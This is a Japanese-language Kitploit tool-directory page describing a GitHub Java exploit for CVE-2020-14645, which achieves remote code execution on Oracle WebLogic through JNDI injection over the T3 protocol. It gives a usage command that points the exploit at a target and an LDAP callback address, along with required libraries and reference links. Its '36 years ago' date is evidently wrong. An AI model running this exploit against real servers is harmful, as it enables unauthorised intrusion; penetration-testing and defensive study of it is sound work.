Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-14645 — CVE-2020-14645を標的としたJavaベースのエクスプロイトで、Oracle WebLogic T3プロトコルにJNDIインジェクションを用いてリモートコード実行を行います。 | Kitploit
ツール/GitHubGitHub/daboquan/cve-2020-14645
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubdaboquan/cve-2020-14645

CVE-2020-14645

CVE-2020-14645を標的としたJavaベースのエクスプロイトで、Oracle WebLogic T3プロトコルにJNDIインジェクションを用いてリモートコード実行を行います。

リポジトリを見る
36年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-14645

使い方

まず NDI-Injection-Exploit を使用してリッスンし、LDAP アドレスを生成します。

java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]

-Tatget と -RMI は必須です。HTTPS では --SSL パラメータを使用可能です。-Port のデフォルトは 7001 です。

自分でコンパイルする場合は、coherence.jar と wlfullclient.jar を追加する必要があります。

脆弱性参考:

https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247484377&idx=1&sn=01d62d175127099275a243ab5fe02bc3&chksm=f9ee6f66ce99e670dbb6da2a3648ea5f6a91fa503441dccd903f44e76883019890d8a9701a29&scene=158#rd

コード参考:

https://github.com/Y4er/CVE-2020-2883

ツールをダウンロード